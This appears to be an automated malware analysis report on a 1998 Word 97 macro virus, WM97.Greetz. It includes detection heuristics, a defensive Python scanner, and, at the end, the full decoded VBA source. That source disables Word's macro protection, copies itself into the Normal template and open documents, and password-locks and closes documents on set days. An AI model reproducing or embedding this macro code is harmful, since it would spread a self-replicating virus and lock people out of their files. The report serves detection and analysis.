Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b77a18eb09c9e5b7…

MALICIOUS

Office (OLE)

Size: 34.0 KB
Created: 1998-04-23 03:17:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 3c57c120518b42a9e0c404d934b4d4dd
SHA-1: b8ebbd488d8716f6e63dd1bc7721606d9593986e
SHA-256: b77a18eb09c9e5b759226eb6e73c093f517571637ae30450cb0887233f0da308
Risk score: 248

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Word 97 VBA macro virus that names itself in script comments as WM97.Greetz (also 'Word97.Greetz'), written by 'Kid Chaos' of the SLAM virus team in April 1998, consistent with the 1998 creation timestamp in the file metadata. Three modules, KidChaos, SLAM and Greetz, carry the infection cycle. AutoOpen (module SLAM) optionally shows an Office Assistant greeting balloon (Rnd() < 0.4) and then calls KC (module KidChaos), which sets Options.VirusProtection = False to switch off Word's macro warning, uses the WordBasic compatibility object (CountMacros/MacroName$) to check whether the active document (context 1) already holds a 'SLAM' macro and whether the Normal template (context 0) already holds 'Greetz', and then copies all three modules in whichever direction is missing with Application.OrganizerCopy, saving the active document as a template (wdFormatTemplate) and setting Options.SaveNormalPrompt = False so the infected Normal template is written back without a prompt. The remaining routines are date-triggered payloads and anti-inspection hooks: HelpAbout shows a message box after the 13th of the month, and FileTemplates, ToolsMacro and ViewVBcode, which replace Word's built-in commands of the same names while the infected template is loaded, set a document password ('KidChaos', 'WeRoqs', 'SLAM98') and close the document on the 13th, 1st and 20th, blocking the menu routes to the Organizer and the macro editor on those days. The code is unobfuscated, and it is a genuine VBA project rather than a Word 6/95 WordBasic macro: the OLE_LEGACY_WORDBASIC_MACRO_VIRUS heuristic fires on the AutoOpen plus ToolsMacro names, while OLE_VBA_MACRO_VIRUS_REPLICATION (OrganizerCopy into NormalTemplate, VirusProtection disabled) and OLE_VBA_AUTOOPEN capture the replication mechanism directly. One defect worth noting when reading the listing: the With Application block omits the leading dots, so ScreenUpdating = False and DisplayAlerts = wdAlertsNone assign implicitly declared variables rather than Application properties; only the later Application.DisplayAlerts = wdAlertsAll touches the real setting.

Heuristics 5

  • ClamAV: Doc.Trojan.Kid-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Kid-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
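As an added illustration, not part of the analysis tool or of the original report, the Python below re-implements the three VBA heuristics above as plain regular-expression rules over decoded macro source. It folds VBA line continuations first so that the multi-line OrganizerCopy call is matched as one statement, and it requires an auto-execution macro together with a built-in-command override (ToolsMacro, FileTemplates, ViewVBCode and the other names listed in the heuristic) before raising the legacy macro-virus rule. The sample input is a constructed excerpt of the extracted macros.bas shown further down; the rule identifier NORMAL_SAVE_PROMPT_SUPPRESSED and the verdict labels are assumed names, not identifiers from this report.

```python
import re
from dataclasses import dataclass
from typing import List, Set

# Constructed excerpt of the decoded macro source (trimmed from the macros.bas
# artifact on this page) so the scanner runs offline on realistic input.
SAMPLE_MACRO = """
Sub KC()
Dim Temp(3) As String
    Options.VirusProtection = False
 For k = 1 To WordBasic.CountMacros(1)
 Next k
    Application.OrganizerCopy Source:=ActiveDocument.FullName, _
     Destination:=NormalTemplate.FullName, Name:=Temp(z), _
      Object:=wdOrganizerObjectProjectItems
    Options.SaveNormalPrompt = False
End Sub

Sub AutoOpen()
' WM97.Greetz dedicated to my brotherz of SLAM VIRUS TEAM!
Call KC
End Sub

Sub ToolsMacro()
ActiveDocument.Password = "WeRoqs"
End Sub
"""

# Constructed benign comparison: an auto macro alone is common in legitimate templates.
BENIGN_MACRO = """
Sub AutoOpen()
    ActiveDocument.Range.InsertBefore "Opened"
End Sub
"""

AUTO_MACRO = re.compile(
    r"^(?:Public\s+|Private\s+)?Sub\s+(AutoOpen|AutoExec|AutoNew|AutoClose|AutoExit|Document_Open)\b", re.I)
# A macro carrying a built-in Word command name replaces that command while its template is loaded.
COMMAND_OVERRIDE = re.compile(
    r"^(?:Public\s+|Private\s+)?Sub\s+(ToolsMacro|FileTemplates|ViewVBCode|MacroFile|FileMacro|GlobMacro)\b", re.I)
VIRUS_PROTECTION_OFF = re.compile(r"Options\.VirusProtection\s*=\s*False", re.I)
VBE_REWRITE = re.compile(r"\.(InsertLines|DeleteLines|AddFromString)\b", re.I)
ORGANIZER_TO_GLOBAL = re.compile(r"\bOrganizerCopy\b.*\bNormalTemplate\b", re.I)
SAVE_NORMAL_SILENT = re.compile(r"Options\.SaveNormalPrompt\s*=\s*False", re.I)


@dataclass
class Finding:
    rule_id: str
    severity: str
    line: str  # the continuation-folded statement that matched


def fold_continuations(src: str) -> List[str]:
    """Join VBA ' _' line continuations so a multi-line call becomes one statement."""
    return re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", src).splitlines()


def scan_macro(src: str) -> List[Finding]:
    findings: List[Finding] = []
    has_auto = has_override = False
    for raw in fold_continuations(src):
        line = raw.strip()
        if not line or line.startswith("'"):  # skip blanks and comment lines
            continue
        if AUTO_MACRO.match(line):
            has_auto = True
            findings.append(Finding("OLE_VBA_AUTOOPEN", "low", line))
        if COMMAND_OVERRIDE.match(line):
            has_override = True
        if VIRUS_PROTECTION_OFF.search(line) or VBE_REWRITE.search(line) or ORGANIZER_TO_GLOBAL.search(line):
            findings.append(Finding("OLE_VBA_MACRO_VIRUS_REPLICATION", "critical", line))
        if SAVE_NORMAL_SILENT.search(line):
            findings.append(Finding("NORMAL_SAVE_PROMPT_SUPPRESSED", "medium", line))  # assumed rule id
    if has_auto and has_override:
        findings.append(Finding("OLE_LEGACY_WORDBASIC_MACRO_VIRUS", "high",
                                "auto-execution macro plus built-in command override"))
    return findings


def rule_ids(findings: List[Finding]) -> Set[str]:
    return {f.rule_id for f in findings}


def verdict(findings: List[Finding]) -> str:
    """Collapse findings to one label; 'critical' alone is enough for MALICIOUS."""
    severities = {f.severity for f in findings}
    if "critical" in severities:
        return "MALICIOUS"
    if "high" in severities:
        return "SUSPICIOUS"
    return "LOW" if findings else "CLEAN"


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        hits = scan_macro(src)
        print(name, verdict(hits))
        for h in hits:
            print("  ", h.rule_id, h.severity, "|", h.line)
```

The continuation folding is the part that matters in practice: a line-by-line scan that looks for OrganizerCopy and NormalTemplate on the same physical line misses this sample, because the call is split across three lines with `_` continuations.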

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3229 bytes
SHA-256: 9596e1ddb92582fc39a0be2ea17e5b9dfebdabec79ec01143375ce11b602cdee
Detection
ClamAV: Doc.Trojan.Kid-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "KidChaos"
Sub KC()
Dim Temp(3) As String
On Error GoTo Au
Temp(1) = "KidChaos"
Temp(2) = "SLAM"
Temp(3) = "Greetz"
With Application
    ScreenUpdating = False
    DisplayAlerts = wdAlertsNone
End With
    Options.VirusProtection = False
    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate
    DocInf = False
    GloInf = False
 For k = 1 To WordBasic.CountMacros(1)
 If WordBasic.MacroName$(k, 1) = "SLAM" Then DocInf = 1
 Next k
 If DocInf = False Then
     For z = 1 To 3
    Application.OrganizerCopy Source:=NormalTemplate.FullName, _
     Destination:=ActiveDocument.FullName, Name:=Temp(z), _
      Object:=wdOrganizerObjectProjectItems
      Next z
    ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
        End If
        For k = 1 To WordBasic.CountMacros(0)
 If WordBasic.MacroName$(k, 0) = "Greetz" Then GloInf = 1
 Next k
       If GloInf = False Then
       For z = 1 To 3
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
         Destination:=NormalTemplate.FullName, Name:=Temp(z), _
          Object:=wdOrganizerObjectProjectItems
          Next z
        Options.SaveNormalPrompt = False
    End If
    Application.DisplayAlerts = wdAlertsAll
Au:

End Sub

Sub AutoExec()
'-----X-----S L A M    R O Q S !!! -----X-----
End Sub

Attribute VB_Name = "SLAM"
    
Sub AutoOpen()
' WM97.Greetz dedicated to my brotherz of SLAM VIRUS TEAM!
' (c) April 1998, by Kid Chaos [SLAM]
On Error GoTo seeya
If (Rnd() < 0.4) Then
With Assistant.NewBalloon
.BalloonType = msoBalloonTypeBullets
.Icon = msoIconTip
.Button = msoButtonSetOkCancel
.Heading = "Word97.Greetz" & vbCrLf & "by Kid Chaos [SLAM]"
.Labels(1).Text = " Greetings to SLAM friends:"
.Labels(2).Text = " Virtual Daemon" & vbCrLf & " Aurodreph" _
& vbCrLf & " CyberYoda" & vbCrLf & " Darx Kies" & vbCrLf & _
" Forms" & vbCrLf & " rAiD" & vbCrLf & " Shaitan" & vbCrLf & _
" Stealth Warrior" & vbCrLf & " Trigger" & vbCrLf & " Yesna"
.Show
End With
End If
seeya:
Call KC
End Sub

Sub HelpAbout()
On Error GoTo Ha
If (Day(Now()) > 13) Then
MsgBox "====> (c) 1998 by Kid Chaos <====" & vbCrLf & _
"====>  of SLAM Virus Team  <====" & vbCrLf & vbCrLf & _
"Hey Bill Gates, do you like other cake" & vbCrLf & _
"on your face? :-D" _
, vbCritical, "About WM97.Greetz... :-)"
End If
Ha:
End Sub


Attribute VB_Name = "Greetz"
Sub FileTemplates()
On Error GoTo Ft
If (Day(Now()) = 13) Then
ActiveDocument.Password = "KidChaos"
Documents.Close SaveChanges:=wdSaveChanges
End If
Ft:
End Sub


Sub ToolsMacro()
On Error GoTo St
If (Day(Now()) = 1) Then
ActiveDocument.Password = "WeRoqs"
Documents.Close SaveChanges:=wdSaveChanges
End If
St:
End Sub


Sub ViewVBcode()
On Error GoTo Vv
If (Day(Now()) = 20) Then
ActiveDocument.Password = "SLAM98"
Documents.Close SaveChanges:=wdSaveChanges
End If
Vv:
End Sub